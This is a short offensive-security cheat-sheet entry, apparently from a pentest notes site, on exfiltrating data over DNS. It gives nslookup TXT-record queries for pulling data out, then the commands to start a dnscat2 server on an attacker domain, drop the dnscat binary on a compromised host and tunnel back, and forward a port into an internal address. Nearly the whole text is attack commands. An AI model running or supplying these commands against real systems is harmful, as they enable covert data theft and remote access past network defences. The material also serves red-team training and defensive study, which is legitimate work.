Last updated 7 months ago
Data can be exfiltrated using DNS records and the protocol itself
Create a txt record on compromised server and exfil line by line
nslookup -type=txt exfiltrated.data.dogs.corp
Spin up dnscat2 server
dnscat2-server feline.corp
Drop binary on compromised host and create tunnel
./dnscat feline.corp
View sessions
windows
Interact with a session
window -i 1
Set up a port forward
listen 0.0.0.0:1338 172.16.192.217:4646
